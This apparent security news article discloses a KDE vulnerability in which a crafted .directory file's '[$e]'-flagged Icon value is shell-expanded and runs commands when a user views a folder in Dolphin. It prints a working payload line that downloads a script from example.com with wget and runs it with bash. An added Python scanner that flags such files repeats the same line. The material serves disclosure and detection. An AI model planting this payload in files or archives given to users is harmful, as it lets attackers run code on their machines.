KDE code execution vulnerability when viewing a file listing

A vulnerability has been identified in KDE that lets an attacker execute arbitrary commands when a user views a directory or archive containing specially crafted ".desktop" and ".directory" files. The attack requires only that the user view the file listing in the Dolphin file manager, download the malicious file, or drag a shortcut onto the desktop or into a document. The problem is present in the current KDE Frameworks 5.60.0 release and in earlier versions, going back to KDE 4. At the time of writing the vulnerability remains unfixed (no CVE has been assigned).

The problem is caused by an incorrect implementation of the KDesktopFile class: when processing the "Icon" parameter it passes the value, without proper escaping, to the function KConfigPrivate::expandString(), which performs shell-style expansion of the value, including treating "$(..)" sequences as commands to be executed, with their output substituted into the value. Contrary to the requirements of the XDG specification, shell constructs are expanded without regard to the kind of setting being read: not only when building the command line of the application to launch, but also when resolving the icon to be displayed by default.

For example, to carry out the attack it is enough to send the user a zip archive containing a directory with a ".directory" file such as:

[Desktop Entry]
Type=Directory
Icon[$e]=$(wget${IFS}https://example.com/FILENAME.sh&&/bin/bash${IFS}FILENAME.sh)

When the user tries to view the contents of the archive in the Dolphin file manager, the script https://example.com/FILENAME.sh is downloaded and executed. The "[$e]" suffix on the key is what requests expansion of the value; the "${IFS}" references are expanded by the shell that runs the command into whitespace, so the command that actually runs is equivalent to "wget https://example.com/FILENAME.sh && /bin/bash FILENAME.sh".
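The following is an added example, not code from the article or from KDE. It models the expansion described above as a dry run that records the commands "$(..)" would hand to popen() instead of running them, and uses that model to scan an in-memory zip archive for ".desktop"/".directory" members whose "[$e]"-flagged keys would execute a command. The expansion model (first ')' closes a "$(..)" block, "$VAR" and "${VAR}" read the environment, "$$" yields a literal "$") is written from the behaviour described here and is an assumption about KConfig internals, not a copy of its code; the function names and the sample archive are constructed for the example.

```python
"""Dry-run model of KConfig's [$e] expansion plus a scanner for archives that
carry .desktop/.directory files abusing it.  Added example; the expansion
rules are an assumption based on the described behaviour, not KConfig code."""
import io
import re
import zipfile

# KConfig key syntax: Key[locale][$flags]=value  (flags: i=immutable,
# e=expand, d=deleted).  A locale bracket never starts with '$'.
KEY_RE = re.compile(
    r"^(?P<key>[^\[=]+?)"
    r"(?P<locale>\[[^\]$][^\]]*\])?"
    r"(?:\[\$(?P<flags>[ied]+)\])?"
    r"\s*=\s*(?P<value>.*)$"
)

DESKTOP_SUFFIXES = (".desktop", ".directory")


def expand_dry_run(value, env=None):
    """Return (expanded_value, commands) without executing anything.

    "$(cmd)" is cut at the first ')' and recorded as a command whose output
    would replace the token; "$VAR"/"${VAR}" come from env; "$$" is "$";
    a lone '$' is dropped.  (Assumed semantics, see the lead-in.)
    """
    env = env or {}
    out, cmds, i, n = [], [], 0, len(value)
    while i < n:
        c = value[i]
        if c != "$" or i + 1 >= n:
            out.append(c)
            i += 1
            continue
        nxt = value[i + 1]
        if nxt == "(":                      # $(cmd) -> popen(cmd)
            end = value.find(")", i + 2)
            end = n if end == -1 else end
            cmd = value[i + 2:end]
            cmds.append(cmd)
            out.append("<output of: %s>" % cmd)
            i = end + 1
        elif nxt == "$":                    # $$ -> $
            out.append("$")
            i += 2
        elif nxt == "{":                    # ${VAR}
            end = value.find("}", i + 2)
            end = n if end == -1 else end
            out.append(env.get(value[i + 2:end], ""))
            i = end + 1
        else:                               # $VAR (letters, digits, '_')
            name = re.match(r"[A-Za-z0-9_]*", value[i + 1:]).group(0)
            out.append(env.get(name, "") if name else "")
            i += 1 + len(name)
    return "".join(out), cmds


def parse_desktop(text):
    """Yield (group, key, locale, flags, value) for each key line."""
    group = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("[") and line.endswith("]"):
            group = line[1:-1]
            continue
        m = KEY_RE.match(line)
        if m:
            yield (group, m.group("key"), m.group("locale"),
                   m.group("flags") or "", m.group("value"))


def scan_desktop_file(text, env=None):
    """Findings for every [$e] key whose expansion would run a command.
    The key name is deliberately not consulted: expansion is applied to any
    key, so Icon is as dangerous as Exec."""
    findings = []
    for group, key, _loc, flags, value in parse_desktop(text):
        if "e" not in flags:
            continue                        # no expansion requested
        _expanded, cmds = expand_dry_run(value, env)
        if cmds:
            findings.append({"group": group, "key": key, "commands": cmds})
    return findings


def scan_zip(data, env=None):
    """Scan every .desktop/.directory member of a zip given as bytes."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            name = info.filename
            if name.endswith("/") or not name.endswith(DESKTOP_SUFFIXES):
                continue
            text = zf.read(info).decode("utf-8", errors="replace")
            for f in scan_desktop_file(text, env):
                f["member"] = name
                findings.append(f)
    return findings


# Constructed samples: the payload shape from the article and a benign file
# that uses [$e] legitimately (environment variable only, no command).
MALICIOUS_DIRECTORY_FILE = """[Desktop Entry]
Type=Directory
Icon[$e]=$(wget${IFS}https://example.com/FILENAME.sh&&/bin/bash${IFS}FILENAME.sh)
"""

BENIGN_DESKTOP_FILE = """[Desktop Entry]
Type=Application
Name=Editor
Name[de]=Editor
Exec=editor %f
Icon=accessories-text-editor
Path[$e]=$HOME/Documents
"""


def build_sample_zip():
    """Constructed sample archive (not a real-world artefact)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("photos/.directory", MALICIOUS_DIRECTORY_FILE)
        zf.writestr("photos/editor.desktop", BENIGN_DESKTOP_FILE)
        zf.writestr("photos/readme.txt", "nothing to see here\n")
    return buf.getvalue()


if __name__ == "__main__":
    for f in scan_zip(build_sample_zip()):
        print(f["member"], f["key"], f["commands"])
```

The scanner reports the ".directory" member with its Icon key and the recorded command string, and stays silent on the benign file whose "[$e]" only references "$HOME". Because the expansion is applied regardless of key type, flagging any "[$e]" value that contains "$(" is the right bar for anything that arrives from an untrusted source; nothing a directory icon legitimately needs requires running a command.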


source: budenet.ru
